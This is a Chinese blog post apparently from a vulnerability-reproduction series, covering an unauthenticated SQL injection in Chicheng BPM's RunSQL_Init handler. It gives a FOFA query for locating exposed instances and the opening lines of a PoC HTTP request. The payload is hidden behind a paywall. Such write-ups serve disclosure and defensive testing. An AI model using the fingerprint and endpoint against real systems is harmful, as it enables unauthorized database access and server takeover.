驰骋BPM RunSQL_Init SQL注入漏洞复现

已于 2024-08-09 10:28:56 修改
阅读量133 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-08-09 10:28:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/141054248
版权

0x01 产品简介

驰骋BPM系统由济南驰骋信息技术有限公司研发,具有悠久的历史和丰富的行业经验。其工作流引擎CCFlow自2003年开始研发,是国内知名的老牌工作流引擎,在BPM领域拥有广泛的研究群体与应用客户群。统提供.net与java两个版本,且两个版本的代码结构、数据库结构、设计思想、功能组成、操作手册完全相同。产品核心代码100%开源,便于用户跟踪调试、修改及扩展。

0x02 漏洞概述

驰骋BPM RunSQL_Init 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:

icon_hash="-1564380241" || body="正在登录流程&表单引擎设计器,请稍候"

0x04 漏洞复现 

PoC

POST /WF/Comm/Handler.ashx?DoType=RunSQL_Init HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----123128
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
驰骋BPM工作流后台常用接口与前台常用方法
zhmengjuan的博客
11-24 716
一、流程引擎后台常用接口 接口说明 所谓的驰骋工作流引擎的接口,在BP.WF.Dev2Interface.cs上面的静态方法,前台页面通过这些静态方法通过页面于操作者提供交互数据功能交互。 Port_* 开头的方法都是组织结构相关的操作,比如:登录、登出、发送消息。 DB_*的都是提供数据列表的接口,比如:发起列表、待办列表、在途列表、完成列表等。 驰骋BPM工作流的发起、待办、在途菜单功能都是通过这个静态方法提供的BP.WF.Dev2Interface.DB_*接口生成的列表。 驰骋BP...
驰骋BPM工作流框架ccflow 集团应用模式用户组功能
zhmengjuan的博客
06-02 358
关键字 驰骋BPM ,工作流开发框架,用户组,接受人规则,用户组发起人范围,选择人范围. 集团工作模式. Ccflow ,jflow.工作流引擎 名词定义与应用背景 对于集团模式的ccflow,jflow每个组织(分公司)都是有自己的独立岗责体系,岗位表,岗位类型表,都有OrgNO字段进行隔离的。实际工作中对于整个集团来说,有一个对整体工作人员的分组,我们叫用户组。比如:党员组、团员组、秘书组、评估标人协会等等。 用户组是对于全集团的人员分组概念,而岗位就是对本组织的人员分组概念。 用户组的设置功
驰骋BPM系统插上AI的翅膀
开源驰骋工作流引擎
06-01 330
0. 概要接受驰骋bpm的优点,官方网站,下载地址,安装。 1. 能够根据提示词自动的生成流程节点。 2. 能够根据节点名字,自动绑定岗位、绑定人员、部门. 3. 分析出来流程设计不合理的地方。 4. AI辅助设计人员进行设计,辅助测试人员进行测试。
关于驰骋BPM-工作流引擎的工作授权的功能变更
ccflow_LQ的博客
11-12 294
关于驰骋BPM-工作流引擎的工作授权的功能变更 概述 基本概念:授权也叫委托,就是把自己的工作委托给另外一个人处理。 功能概述: 一个人可以委托个多个人,一个人可以接受多个人的委托。 每个委托可以设置一个截止时间,超过时间后,就不能在执行委托工作。 一个人的待办集合=本人的待办集合+其他人委托给他的工作。 目前不支持按照指定的流程委托。 数据结构设计: 前台功能设置委托: 进入设置页面: 我的委托列表: 新增委托: 运行效果: ...
关于广州xx公司对驰骋BPM, 流程引擎表单引擎 常见问题解答
开源驰骋工作流引擎
02-07 2038
@驰骋工作流,ccflow周朋 周总早, ccflow 功能很强大,在体验过程中,以下几个问题需沟通下: 先使用.net 再使用java,数据迁移问题?会存在哪些问题。 RE: 。net 版本的ccflow与java版本的jflow系列版本都是一个数据库结构,一个操作手册,流程模版,表单模版通用,前台代码html,js一致。所以不存在迁移问题。 Etc: java 与.net 我们有不同的版...
驰骋BPM系统-表单引擎-流程引擎 2020年大换装
zhmengjuan的博客
02-11 286
关键字:驰骋表单引擎,流程引擎,工作流界面升级. 前言概述: 感谢美工与同事们的辛苦工作,ccbpm新年大换装,迎接爱好者,为这阴霾多日的疫情气氛增添一笔光彩。 本次的色系以浅灰色为主,因为ccbpm大多的工作模式是嵌入到您的开发框架进行工作,所以ccbpm的色系必须是百搭款,浅灰色,无个性。可以多方色系进行搭配。 色系无个性,就是个性,简洁、明快是驰骋bpm设计的主线。 本次的界面更新...
没有unity_无聊记一次BPM_ETL_DataPipline的入门
大话程序员
06-21 250
6年前的开源: FoxBPM: 开源的BPM、流程引擎项目 (gitee.com)
汉子转五笔SQL脚本函数
Azhangdeng的专栏
12-25 2285
--汉子转五笔函数 USE [cisdb_pzhyy] GO /****** Object: UserDefinedFunction [dbo].[Get_WBM] Script Date: 12/25/2020 10:36:08 ******/ SET ANSI_NULLS ON GO SET QUOTED_IDENTIFIER ON GO ALTER FUNCTION [dbo].[Get_WBM] ( @str VARCHAR(200) ) RETURNS VARCHAR(200) AS...
一口气说明白驰骋BPM的工作模式.
开源驰骋工作流引擎
10-22 2616
关键字:驰骋工作流引擎 流程引擎工作模式 流程中间件工作模式 标题:一口气说明白驰骋BPM的工作模式. 内容: Ccbpm的工作模式并不代表其他流程引擎也有此工作模式。 我们把是否集的角度分为:独立工作模式与中间件工作模式。 如果您想把ccbpm作为中间件的模式植入到您的开发架构,我们把这样的模式称为中间件工作模式。 这种模式下您需要按照操作手册做组织结构集成与代码集成就可以了,在您的...
驰骋工作流引擎重要数据查询大全.sql
12-14
这些SQL查询语句揭示了驰骋工作流引擎的强大功能,使用户可以方便地跟踪和管理他们参与的流程,以及与之相关的待办事项和抄送信息。通过这些查询,管理员可以有效地监控工作流的运行状态,优化业务流程,并确保团队...
驰骋bpm插上AI的翅膀.docx
06-03
### 让驰骋BPM插上AI的翅膀 在当今高度竞争且变化莫测的商业环境中,企业对于提升效率、优化流程以及降低成本的需求日益增长。业务流程管理(BPM)系统作为实现这些目标的关键工具之一,其重要性不言而喻。其中,...
驰骋BPM新功能-发送自动返回给发送人与发送节点.docx
03-28
驰骋BPM是一款高效的工作流程管理系统,其新功能——发送自动返回给发送人与发送节点,为企业的审批流程设计提供了更灵活、智能的解决方案。在日常的企业管理中,尤其是在涉及多部门协作的审批流程中,常常需要某个...
驰骋BPM-新增功能发布-签批组件.docx
04-08
驰骋BPM是一款专为公文管理设计的业务流程管理系统,尤其在签批组件的更新中,它提供了更高效、规范化的签批处理方式。签批组件是驰骋BPM中一个关键的功能,主要用于公文流转签批过程,特别是在政府和国有企业等对...
驰骋BPM遇到了AI.docx
06-03
### 当驰骋BPM遇到了AI #### 一、引言 在当今数字化转型的大背景下,企业不断寻求提高业务效率和客户满意度的新途径。业务流程管理(Business Process Management, BPM)作为提升组织运营效能的重要手段之一,近年来...
驰骋BPM工作流程引擎服务性能(压力)测试报告
09-15
在本部分,报告将详细列举出驰骋BPM工作流程引擎服务的压力测试结果,包括但不限于响应时间、吞吐量、并发用户数等关键性能指标。通过这些数据,可以评估该软件在不同负载条件下的表现。 ### 二、引言 #### 2.1 ...
驰骋工作流引擎_表单设计器操作手册范本.docx
09-21
### 驰骋工作流引擎_表单设计器操作手册关键知识点 #### 一、总体说明 ##### 1.1 前言 驰骋表单设计器是一种强大的工具,支持多种设计模式和展示方式,旨在帮助用户高效地创建各种类型的表单。它采用了一种统一的...
.net版驰骋BPM系统,含表单引擎+流程引擎+权限控制
04-19
.NET版驰骋BPM系统是一款基于.NET框架设计的业务流程管理(Business Process Management)解决方案,专为满足中国企业的独特需求而打造。系统的核心组件包括表单引擎、流程引擎和权限控制,这三大模块共同构建了一个...
国外有activiti,国内有JFlow, Java版驰骋BPM=表单引擎+流程引擎+权限控制,方便集成,配置灵活,功能强大
最新发布
06-09
Java版的驰骋BPM(Business Process Management)是一款在国内广泛应用的工作流引擎,它与国际知名的Activiti相媲美,但更贴合中国的实际业务需求。本文将深入探讨驰骋BPM的核心组件、特点以及如何利用它来提升企业...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值